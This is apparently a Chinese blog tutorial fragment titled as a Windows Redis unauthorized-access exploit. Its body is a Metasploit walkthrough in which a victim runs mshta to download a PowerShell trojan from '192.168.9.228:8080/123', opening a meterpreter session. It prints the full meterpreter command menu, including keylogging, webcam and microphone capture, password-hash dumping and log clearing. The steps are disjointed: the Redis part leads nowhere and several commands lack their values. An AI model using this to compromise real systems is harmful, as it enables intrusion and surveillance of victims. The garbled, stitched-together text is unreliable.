Redis未授权访问漏洞(Windows系统)下载redis
yum install redis
或者
apt-get install redis
通过命令⾏连接(redis默认端⼝6379)
redis-cli -h host -p port -a password
host:远程redis服务器host
port:远程redis服务端⼝
session下载
password:远程redis服务密码(⽆密码的的话就不需要-a参数了)
msf的rb脚本⽬录,再拷贝下载的rb脚本到msf脚本⽬录
进⼊msf后重新加载下
use
set uripath
exploit(这⾥等待客户端执⾏ "192.168.9.228:8080/123")
执⾏的时候腾讯电脑管家报毒了,这⾥是使⽤mshta⼯具下载远程服务器的123⽊马⽂件
恢复该⽊马后查看源码如下,是个powershell进程隐藏⽊马
powershell进程列表
服务端这边看到的会话
sessions 2进⼊该会话后看sysinfo
可执⾏的命令有:
meterpreter > ?
Core Commands
=============
Command                  Description
-------                  -----------
?                        Help menu
background                Backgrounds the current session
bg                        Alias for background
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                    Executes a meterpreter script as a background thread
channel                  Displays information or control active channels
close                    Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding  Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
guid                      Get the session GUID
help                      Help menu
info                      Displays information about a Post module
irb                      Open an interactive Ruby shell on the current session
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session    migrate                  Migrate the server to another process
pivot                    Manage pivot listeners
pry                      Open the Pry debugger on the current session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                      Executes a meterpreter script or Post module
secure                    (Re)Negotiate TLV packet encryption on the session
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                    Force Meterpreter to go quiet, then re-establish session.    transport                Change the current transport mechanism
use                      Deprecated alias for"load"
uuid                      Get the UUID for the current session
write                    Writes data to a channel
Stdapi: File system Commands
============================
Command      Description
-------      -----------
cat          Read the contents of a file to the screen
cd            Change directory
checksum      Retrieve the checksum of a file
cp            Copy source to destination
del          Delete the specified file
dir          List files (alias for ls)
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd        Print working directory
lcd          Change local working directory
lls          List local files
lpwd          Print local working directory
ls            List files
mkdir        Make directory
mv            Move source to destination
pwd          Print working directory
rm            Delete the specified file
rmdir        Remove directory
search        Search for files
show_mount    List all mount points/logical drives
upload        Upload a file or directory
Stdapi: Networking Commands
===========================
Command      Description
-------      -----------
arp          Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat      Display the network connections
portfwd      Forward a local port to a remote service
resolve      Resolve a set of host names on the target
route        View and modify the routing table
Stdapi: System Commands
=======================
Command      Description
-------      -----------
clearev      Clear the event log
drop_token    Relinquishes any active impersonation token.
execute      Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as
kill          Terminate a process
localtime    Displays the target system local date and time
pgrep        Filter processes by name
pkill        Terminate processes by name
ps            List running processes
reboot        Reboots the remote computer
reg          Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell        Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token  Attempts to steal an impersonation token from the target process    suspend      Suspends or resumes a list of processes
sysinfo      Gets information about the remote system, such as OS Stdapi: User interface Commands
===============================
Command        Description
-------        -----------
enumdesktops  List all accessible desktops and window stations
getdesktop    Get the current meterpreter desktop
idletime      Returns the number of seconds the remote user has been idle
keyboard_send  Send keystrokes
keyevent      Send key events
keyscan_dump  Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop  Stop capturing keystrokes
mouse          Send mouse events
screenshare    Watch the remote user desktop in real time
screenshot    Grab a screenshot of the interactive desktop
setdesktop    Change the meterpreters current desktop
uictl          Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command        Description
-------        -----------
record_mic    Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command      Description
-------      -----------
play          play a waveform audio file (.wav) on the target system Priv: Elevate Commands
======================
Command      Description
-
------      -----------
getsystem    Attempt to elevate your privilege to that of local system. Priv: Password database Commands
================================
Command      Description
-------      -----------
hashdump      Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command      Description
-------      -----------
timestomp    Manipulate file MACE attributes
meterpreter >
View Code
部分命令截图,部分⽆法执⾏
服务端退出后,客户端⾃动关闭powershell进程

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。